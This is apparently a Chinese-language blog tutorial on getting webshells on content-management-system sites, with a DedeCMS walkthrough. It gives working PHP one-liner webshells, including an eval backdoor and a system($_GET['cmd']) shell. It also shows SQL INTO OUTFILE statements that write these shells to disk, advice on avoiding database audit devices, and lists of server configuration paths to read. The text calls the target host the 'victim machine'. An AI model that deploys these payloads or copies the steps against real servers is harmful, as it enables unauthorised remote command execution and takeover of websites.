获取Webshell方法

CMS系统指的是内容管理系统。已经有别人开发好了整个网站的前后端,使用者只需要部署cms,然后通过后台添加数据,修改图片等工作,就能搭建好一个的WEB系统。

CMS获取Webshell****方法

WordPress后台拿Webshell

phpcms拿Webshell

非CMS获取Webshell方法

更多的时候企业并不使用开源的CMS,而是选择自己开发源代码

参考:获取WEBshell思路 · 白帽与安全 · 看云

获取方法

1、数据库备份获取Webshell

2、抓包上传获取Webshell

3、Sql命令获取Webshell

4、模板修改获取Webshell

5、插入一句话获取Webshell

6、修改上传类型获取Webshell

示例

织梦dedecms演示

文件管理器新建木马文件

也可以用上传文件上传免杀的一句话木马

文件内容一句话木马:<?php @eval($_POST['q.']);?>

菜刀连接网址http://192.168.246.11/dedecms/uploads/q.php就可以获得受害机文件

如果没有文件管理器可以在模块的地方安装一下,用完在卸载就可以

标签源码编辑

或者直接新建一个标签源码,输入木马。就可以直接访问

模版修改

修改,在代码里面插入木马。

注意这里后缀是.html

Sql命令获取Webshell

思路:利用sql语句插入语句然后输出到指定木马php

如果提示没有权限,需要配置下my.ini内容secure_file_priv='',这样就可以输出到指定文件

在执行语句就把木马放到指定文件了

因为上面的命令会创建表,如果有数据库审计设备会被发现,所以可以执行以下输入木马语句,避免对数据库操作

select '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'C:\\php\\WWW\\dedecms\\1.php';

echo命令也可以:

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'C:\\php\\WWW\\dedecms\\1.php'

读路径:

select load_file('c://windows//system32//inetsrv//MetaBase.xml ');

默认路径

Windows:
c:\windows\php.ini php配置文件
c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件

Linux:
/etc/php.ini php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件

其他获取webshell方法

1、Tomcat获取Webshell

2、Weblogic获取Webshell

3、JBoss获取Webshell

相关推荐
小小小米粒2 小时前
NAT 模式, 仅主机模式 Host-Only ,桥接模式 Bridge
linux·服务器·网络
nington013 小时前
鸿蒙PC联合宁盾共同开发的“身份域管+网络准入一体化认证方案”将于5月重磅发布
安全·鸿蒙pc
AdMergeX4 小时前
行业热点资讯 | 网信办公布数据出境安全管理政策法规问答;搜狗输入法正式宣布全面AI化;百度文心助手入局春节AI战;
人工智能·安全·百度
头疼的程序员6 小时前
计算机网络:自顶向下方法(第七版)第三章 学习分享(二)
网络·学习·计算机网络
Blurpath住宅代理6 小时前
代理协议深度解析:HTTP与SOCKS5如何科学选型?
网络·静态ip·动态代理·住宅代理
小二·6 小时前
Go 语言系统编程与云原生开发实战(第38篇)
网络·云原生·golang
昵称只能一个月修改一次。。。7 小时前
Linux系统编程:网络编程
linux·服务器·网络
文件夹__iOS7 小时前
iOS 网络安全认证:Token / MD5 / RSA 简明指南
安全·web安全·ios
野犬寒鸦7 小时前
TCP协议核心:TCP详细图解及TCP与UDP核心区别对比(附实战解析)
服务器·网络·数据库·后端·面试
文刀竹肃7 小时前
SQLi-Labs Less-3 通关教程(单引号+括号字符型GET注入)
安全·web安全·网络安全